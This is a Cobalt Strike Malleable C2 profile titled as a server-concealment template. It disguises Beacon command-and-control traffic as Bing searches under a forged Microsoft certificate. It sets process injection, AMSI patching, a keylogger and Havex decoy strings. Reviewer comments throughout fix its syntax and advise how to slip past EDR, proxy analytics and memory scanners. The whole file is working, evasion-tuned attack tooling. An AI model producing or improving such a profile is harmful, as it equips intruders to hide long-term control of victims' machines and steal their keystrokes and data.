CobaltStrike Profile文件模板

CS服务器隐匿

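# Replace the default ssl.store certificate with a self-signed one.
# NOTE(review): a self-signed certificate whose subject claims to be
# Microsoft / www.bing.com is itself a strong indicator: it never validates,
# and cert-subject / TLS-fingerprint rules specifically look for "big brand"
# subjects on self-signed certs. For anything beyond a lab, use a real
# certificate for a domain you control (keystore + password below) and drop
# the impersonating subject fields.
https-certificate {
    # With a real, valid certificate only keystore and password are needed:
    # set keystore "path/to/keystore.store";
    # set password "keystore password";
    set CN       "www.bing.com";
    set O        "Microsoft Corporation";
    set C        "US";
    set L        "Redmond";
    set OU       "Microsoft IT";
    set ST       "WA";
    # Validity of the self-signed certificate, in days.
    set validity "365";
}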
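# Name under which this profile shows up (e.g. in c2lint output).
set sample_name "ExterminateDog";
# Beacon sleep time in milliseconds: 30000 = 30 s (the Cobalt Strike default is 60 s).
# The original comment claimed 60000 — the value is what counts.
set sleeptime "30000";
# Jitter factor 0-99%: randomises each callback interval around sleeptime.
# NOTE(review): "0" makes every callback land on a fixed 30 s period, which is
# exactly the periodicity that beaconing analytics on proxies/NDR key on.
# Use a non-zero value (commonly 20-40) for anything beyond a lab.
set jitter "0";
# Address returned to the DNS Beacon when there is no tasking ("idle").
# It should be a plausible resolution result for the domain in use.
set dns_idle "8.8.8.8";
# Maximum bytes carried per DNS A-record request, so DNS Beacon lookups look
# like ordinary-length queries.
set maxdns "235";
# User-Agent sent with every HTTP request.
# Fixed: the original value was a copy/paste garble —
# "Mozilla/5.0 (Mozilla/5.0 (compatible, MSIE 11, ..." with unbalanced
# parentheses — which no real browser sends and is trivially signaturable.
# This is the stock IE11 / Windows 8.1 string.
set useragent "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko";
# Named pipe for the SMB Beacon and for the SMB stager; each '#' is replaced
# with a random character. The Cobalt Strike defaults are widely signatured,
# so keep these customised and distinct from the post-ex pipenames.
set pipename "mypipe-f##";
set pipename_stager "mypipe-h##";
# NOTE(review): if staged payloads are not required, turn staging off — a live
# stager lets anyone who finds the stager URI download and analyse the full
# Beacon. Uncomment to serve stageless only (this disables the http-stager block):
# set host_stage "false";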
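# Controls how the Beacon DLL is loaded into memory and edits its contents.
# Fixed: every escape sequence in this block had its backslash turned into a
# forward slash by the page export ("/x63", "/n", "/t", "//"). As written,
# rich_header would have been a literal ASCII string rather than bytes and the
# stringw decoys would carry literal "/n" text. Backslashes are restored below.
stage {
    # Ask Beacon to free the memory of the Reflective DLL package that
    # initialised it.
    set cleanup         "true";
    # PE header values written into the generated DLL so it does not carry the
    # stock Beacon header values (checksum, entry point, image size).
    set checksum        "0";
    set entry_point     "134733";
    set image_size_x86  "512000";
    set image_size_x64  "512000";
    # Exported DLL name.
    set name            "Gtmdusa.dll";
    # Compiler "Rich" header bytes to embed, so the DLL does not carry Beacon's own.
    set rich_header    "\x63\x02\x25\x0f\x27\x63\x4b\x5c\x27\x63\x4b\x5c\x27\x63\x4b\x5c\x9a\x2c\xdd\x5c\x24\x63\x4b\x5c\x2e\x1b\xde\x5c\x3b\x63\x4b\x5c\x2e\x1b\xcf\x5c\x1b\x63\x4b\x5c\x2e\x1b\xc8\x5c\x8f\x63\x4b\x5c\x00\xa5\x30\x5c\x28\x63\x4b\x5c\x27\x63\x4a\x5c\x97\x63\x4b\x5c\x2e\x1b\xc1\x5c\x60\x63\x4b\x5c\x2e\x1b\xd9\x5c\x26\x63\x4b\x5c\x39\x31\xdf\x5c\x26\x63\x4b\x5c\x2e\x1b\xda\x5c\x26\x63\x4b\x5c\x52\x69\x63\x68\x27\x63\x4b\x5c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

    # stomppe asks the ReflectiveLoader to stomp the MZ, PE and e_lfanew values
    # after Beacon is loaded (the original comment described it as "light
    # obfuscation", which is a different option — see below).
    # NOTE(review): "false" leaves an intact PE header on the in-memory Beacon,
    # which is what memory scanners look for first. Consider "true" unless a
    # loader of yours depends on the headers.
    set stomppe        "false";
    # NOTE(review): not set in this template. Per the Malleable C2 reference
    # these are the in-memory evasion knobs worth enabling; confirm the names
    # and defaults against your Cobalt Strike version before relying on them:
    # set obfuscate  "true";   # obfuscate import table / unused header content
    # set sleep_mask "true";   # mask Beacon in memory while it sleeps
    # set userwx     "false";  # avoid RWX pages for the Beacon DLL

    # Make the DLL look Havex-ish: rename the ReflectiveLoader export and drop
    # the sos.dll references.
    transform-x86 {
        strrep "ReflectiveLoader" "RunDllEntry";
        strrep "sos.dll"       "";
    }
    transform-x64 {
        strrep "ReflectiveLoader" "RunDllEntry";
        strrep "sos.x64.dll"   "";
    }
    # Decoy strings gathered from Yara rules and sandbox string dumps (these
    # are the Havex strings from the public havex.profile).
    # NOTE(review): resembling Havex cuts both ways — Havex AV/YARA signatures
    # may then fire on the payload. Decide consciously whether that is wanted
    # in a "stealth" profile.
    stringw "%s <%s> (Type=%i, Access=%i, ID='%s')";
    stringw "%02i was terminated by ThreadManager(2)\n";
    stringw "main sort initialise ....\n";
    stringw "qsort [0x%x, 0x%x] done %d this %d\n";
    stringw "{0x%08x, 0x%08x}";
    stringw "Programm was started at %02i:%02i:%02i\n";
    stringw "a+";
    stringw "%02i:%02i:%02i.%04i:";
    stringw "**************************************************************************\n";
    stringw "Start finging of LAN hosts....\n";
    stringw "Finding was fault. Unexpective error\n";
    stringw "Hosts was't found..\n";
    stringw "\t\t\t\t\t%O2i) [%s]\n";
    stringw "Start finging of OPC Servers...";
    stringw "Was found %i OPC Servers.";
    stringw "\t\t%i) [%s\\%s]\n\t\t\tCLSID:          %s\n";
    stringw "\t\t\tUserType:        %s\n\t\t\tVerIndProgID:    %s\n";
    stringw "OPC Servers not found. Programm finished";
    stringw "Start finging of OPC Tags...";
    stringw "[-]Threads number > Hosts number";
    stringw "[-]Can not get local ip";
    stringw "[!]Start";
    stringw "[+]Get WSADATA";
    stringw "[+]Local:";
    stringw "[-]Connection error";
    stringw "Was found %i hosts in LAN:";
    stringw "%s[%s]!!!EXEPTION %i!!!";
    stringw "final combined CRC = 0x%08x";
}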
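# Indicators for HTTP GET transactions (Beacon polling for tasks).
# Fixed: the escaped quotes inside prepend/append had been exported as /" —
# which terminates the string early and makes the profile fail to parse.
# They are restored as \" below.
http-get {
    # Beacon picks one URI at random from this pool if several are given.
    # It must differ from the http-post uri; here the two differ only in case
    # (/search/ vs /Search/) — fine for Beacon, but any redirector or rewrite
    # rule in front of the team server must then match case-sensitively.
    set uri "/search/";
    # What the client (Beacon) sends.
    client {
        # Request headers. The Host override must match what the redirector /
        # CDN in front of the team server expects, or the request is dropped.
        header "Host" "www.bing.com";
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        # NOTE(review): this cookie is a fixed string sent by every Beacon —
        # identical MUID/SID values across hosts are a fingerprint in proxy logs.
        header "Cookie" "MUID=20798CDBA7526BE709939C67A67C6ABD; _EDGE_S=F=1&SID=0D72DD12F8986C1D3C96CDAEF9B66D85; _EDGE_V=1; SRCHD=AF=NOFORM; SRCHUID=V=2&GUID=4E021D8EBD484402BBD21AE8C3DB5A41&dmnchg=1;";
        # Session metadata: base64url-encoded and carried in the "q" query parameter.
        metadata {
            base64url;
            parameter "q";
        }
        # Extra query parameters that make the request look like a Bing search.
        parameter "go" "Search";
        parameter "qs" "bs";
        parameter "form" "QBRE";
    }
    # What the server sends back.
    server {
        # Response headers imitating IIS.
        # NOTE(review): "Keep-Alive" together with "Connection: close" is
        # contradictory; a real server sends one or the other. Pick one.
        header "Server" "Microsoft-IIS/8.5";
        header "Cache-Control" "private, max-age=0";
        header "Content-Type" "text/html; charset=utf-8";
        header "Keep-Alive" "timeout=3, max=100";
        header "Connection" "close";
        header "Vary" "Accept-Encoding";
        # Encoding of tasking in the response body: base64, wrapped in a
        # Bing-looking HTML page.
        output {
            base64;
            prepend "<!DOCTYPE html><html lang=\"en\" xml:lang=\"en\" xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:Web=\"http://schemas.live.com/Web/\"><script type=\"text/javascript\">//<![CDATA[si_ST=new Date;//]]></script><head><!--pc--><title>Bing</title><meta content=\"text/html; charset=utf-8\" http-equiv=\"content-type\" /><link href=\"/search?format=rss&q=canary&go=Search&qs=bs&form=QBRE\" rel=\"alternate\" title=\"XML\" type=\"text/xml\" /><link href=\"/search?format=rss&q=canary&go=Search&qs=bs&form=QBRE\" rel=\"alternate\" title=\"RSS\" type=\"application/rss+xml\" /><link href=\"/sa/simg/bing_p_rr_teal_min.ico\" rel=\"shortcut icon\" /><script type=\"text/javascript\">//<![CDATA[";
            append "G={ST:(si_ST?si_ST:new Date),Mkt:\"en-US\",RTL:false,Ver:\"53\",IG:\"4C1158CCBAFC4896AD78ED0FF0F4A1B2\",EventID:\"E37FA2E804B54C71B3E275E9589590F8\",MN:\"SERP\",V:\"web\",P:\"SERP\",DA:\"CO4\",SUIH:\"OBJhNcrOC72Z3mr21coFQw\",gpUrl:\"/fd/ls/GLinkPing.aspx?\" }; _G.lsUrl=\"/fd/ls/l?IG=\"+_G.IG ;curUrl=\"http://www.bing.com/search\";function si_T(a){ if(document.images){_G.GPImg=new Image;_G.GPImg.src=_G.gpUrl+\"IG=\"+_G.IG+\"&\"+a;}return true;};//]]></script><style type=\"text/css\">.sw_ddbk:after,.sw_ddw:after,.sw_ddgn:after,.sw_poi:after,.sw_poia:after,.sw_play:after,.sw_playa:after,.sw_playd:after,.sw_playp:after,.sw_st:after,.sw_sth:after,.sw_ste:after,.sw_st2:after,.sw_plus:after,.sw_tpcg:after,.sw_tpcw:after,.sw_tpcbk:after,.sw_arwh:after,.sb_pagN:after,.sb_pagP:after,.sw_up:after,.sw_down:after,.b_expandToggle:after,.sw_calc:after,.sw_fbi:after,";
            # Terminator: place the encoded data in the response body as-is.
            print;
        }
    }
}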
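# Indicators for HTTP POST transactions (Beacon sending output back).
# Fixed: escaped quotes in prepend/append restored from /" to \" (the exported
# form terminates the string early), and the duplicate, contradictory
# "Cache-Control: no-cache" header dropped so the response matches http-get.
http-post {
    # URI pool, as for http-get. Differs from the GET uri only in case — see
    # the note there about case-sensitive redirector rules.
    set uri "/Search/";
    client {
        header "Host" "www.bing.com";
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        # Same fixed cookie as http-get; see the fingerprinting note there.
        header "Cookie" "MUID=20798CDBA7526BE709939C67A67C6ABD; _EDGE_S=F=1&SID=0D72DD12F8986C1D3C96CDAEF9B66D85; _EDGE_V=1; SRCHD=AF=NOFORM; SRCHUID=V=2&GUID=4E021D8EBD484402BBD21AE8C3DB5A41&dmnchg=1;";
        # Session id: base64url-encoded and carried in the "form" query parameter.
        id {
            base64url;
            parameter "form";
        }
        parameter "go" "Search";
        parameter "qs" "bs";
        # Beacon output: base64url-encoded and carried in the "q" query parameter.
        # NOTE(review): output in the query string (rather than the body) shows
        # up in full in proxy/web-server access logs and is bounded by URL
        # length limits on intermediaries.
        output {
            base64url;
            parameter "q";
        }
    }
    # Server response to the POST.
    server {
        # NOTE(review): as in http-get, "Keep-Alive" alongside "Connection: close"
        # is contradictory; pick one.
        header "Keep-Alive" "timeout=3, max=100";
        header "Cache-Control" "private, max-age=0";
        header "Content-Type" "text/html; charset=utf-8";
        header "Vary" "Accept-Encoding";
        header "Server" "Microsoft-IIS/8.5";
        header "Connection" "close";
        # Response body: netbios-encoded, then base64, wrapped in the same
        # Bing-looking HTML as http-get.
        output {
            netbios;
            base64;
            prepend "<!DOCTYPE html><html lang=\"en\" xml:lang=\"en\" xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:Web=\"http://schemas.live.com/Web/\"><script type=\"text/javascript\">//<![CDATA[si_ST=new Date;//]]></script><head><!--pc--><title>Bing</title><meta content=\"text/html; charset=utf-8\" http-equiv=\"content-type\" /><link href=\"/search?format=rss&q=canary&go=Search&qs=bs&form=QBRE\" rel=\"alternate\" title=\"XML\" type=\"text/xml\" /><link href=\"/search?format=rss&q=canary&go=Search&qs=bs&form=QBRE\" rel=\"alternate\" title=\"RSS\" type=\"application/rss+xml\" /><link href=\"/sa/simg/bing_p_rr_teal_min.ico\" rel=\"shortcut icon\" /><script type=\"text/javascript\">//<![CDATA[";
            append "G={ST:(si_ST?si_ST:new Date),Mkt:\"en-US\",RTL:false,Ver:\"53\",IG:\"4C1158CCBAFC4896AD78ED0FF0F4A1B2\",EventID:\"E37FA2E804B54C71B3E275E9589590F8\",MN:\"SERP\",V:\"web\",P:\"SERP\",DA:\"CO4\",SUIH:\"OBJhNcrOC72Z3mr21coFQw\",gpUrl:\"/fd/ls/GLinkPing.aspx?\" }; _G.lsUrl=\"/fd/ls/l?IG=\"+_G.IG ;curUrl=\"http://www.bing.com/search\";function si_T(a){ if(document.images){_G.GPImg=new Image;_G.GPImg.src=_G.gpUrl+\"IG=\"+_G.IG+\"&\"+a;}return true;};//]]></script><style type=\"text/css\">.sw_ddbk:after,.sw_ddw:after,.sw_ddgn:after,.sw_poi:after,.sw_poia:after,.sw_play:after,.sw_playa:after,.sw_playd:after,.sw_playp:after,.sw_st:after,.sw_sth:after,.sw_ste:after,.sw_st2:after,.sw_plus:after,.sw_tpcg:after,.sw_tpcw:after,.sw_tpcbk:after,.sw_arwh:after,.sb_pagN:after,.sb_pagP:after,.sw_up:after,.sw_down:after,.b_expandToggle:after,.sw_calc:after,.sw_fbi:after,";
            print;
        }
    }
}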
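# Controls how the stage (the Beacon core) is served to a stager.
# NOTE(review): while this block is live, anyone who finds the stager URI can
# download the full Beacon from the team server. Use stageless payloads and
# `set host_stage "false"` (global) unless staging is genuinely needed.
http-stager {
    # Distinct URIs for the 32-bit and 64-bit stage (differ only in case — the
    # same case-sensitivity caveat as the GET/POST URIs applies at redirectors).
    set uri_x86 "/rpc";
    set uri_x64 "/Rpc";
    client {
        # Host override added for consistency with http-get / http-post: without
        # it the stager request carried the raw listener host, which a
        # redirector keyed on the Host header would reject.
        header "Host" "www.bing.com";
        header "Accept" "*/*";
    }
    server {
        header "Cache-Control" "private, max-age=0";
        header "Content-Type" "text/html; charset=utf-8";
        header "Vary" "Accept-Encoding";
        header "Server" "Microsoft-IIS/8.5";
        header "Connection" "close";
    }
}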
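# Process injection behaviour: how memory is allocated in the target, which
# permissions it gets, and which execution primitives are tried.
# Fixed: startrwx changed from "true" to "false" — RWX as the *initial*
# permission of injected memory is a canonical memory-scanner / EDR trigger,
# and the documented alternative (RW, then RX) costs nothing functionally.
# The "\x90" in the commented prepend lines had been exported as "/x90".
process-inject {
    # Preferred way to allocate memory in the remote process:
    # VirtualAllocEx or NtMapViewOfSection. Per the Malleable C2 reference
    # NtMapViewOfSection applies to same-architecture injection, with
    # VirtualAllocEx as the fallback — confirm against your CS version.
    set allocator "NtMapViewOfSection";
    # Minimum amount of memory to request for the injected content.
    set min_alloc "16700";
    # Final permissions of the injected content: RWX ("true") or RX ("false").
    set userwx "false";
    # Initial permissions of the injected content: RWX ("true") or RW ("false").
    set startrwx "false";
    # Bytes to prepend to the injected content (e.g. a NOP sled).
    transform-x86 {
        # prepend "\x90\x90\x90";
    }
    transform-x64 {
        # prepend "\x90\x90\x90";
    }
    # Execution primitives, tried in order until one succeeds. The quoted
    # "module!function+offset" values are spoofed thread start addresses.
    # NtQueueApcThread-s is the suspended-process variant (spawn-and-inject);
    # plain NtQueueApcThread targets existing threads.
    execute {
        #CreateThread;
        #CreateRemoteThread;
        CreateThread "ntdll.dll!RtlUserThreadStart+0x1000";
        SetThreadContext;
        NtQueueApcThread-s;
        #NtQueueApcThread;
        CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
        RtlCreateUserThread;
    }
}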
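# Post-exploitation job behaviour (the DLLs Beacon spawns/injects for jobs).
# Fixed: the spawnto paths had their backslashes exported as "//"; the
# Malleable C2 syntax is an escaped backslash, "\\".
post-ex {
    # Temporary process spawned for post-ex jobs: syswow64 for 32-bit,
    # sysnative for 64-bit.
    # NOTE(review): gpupdate.exe appears in many public profiles and is
    # correspondingly watched; prefer a binary for which outbound network
    # activity and the chosen parent process are plausible in the target
    # environment, and avoid the Cobalt Strike default (rundll32.exe).
    set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
    set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
    # Obfuscate the post-ex DLL contents.
    set obfuscate "true";
    # Embed key function pointers (GetProcAddress, LoadLibrary, ...) into
    # same-architecture post-ex DLLs so they do not have to resolve them.
    set smartinject "true";
    # Patch AmsiScanBuffer in the spawned process before powerpick,
    # execute-assembly and psinject load .NET / PowerShell code.
    # NOTE(review): the in-memory AMSI patch is itself something EDRs look for
    # (AMSI integrity checks); weigh it against the detection of unpatched
    # AMSI scans in the target environment.
    set amsi_disable "true";
    # Spoofed thread start address for multi-threaded post-ex DLLs.
    set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000";
    # Named pipes used by post-ex jobs to talk to Beacon; '#' is randomised.
    # Keep them distinct from the global pipename / pipename_stager.
    set pipename "DserNamePipe##, PGMessagePipe##, MsFteWds##";
    # Keylogger technique: SetWindowsHookEx (hook-based) or GetAsyncKeyState
    # (polling); hook installation is the more visible of the two.
    set keylogger "SetWindowsHookEx";
}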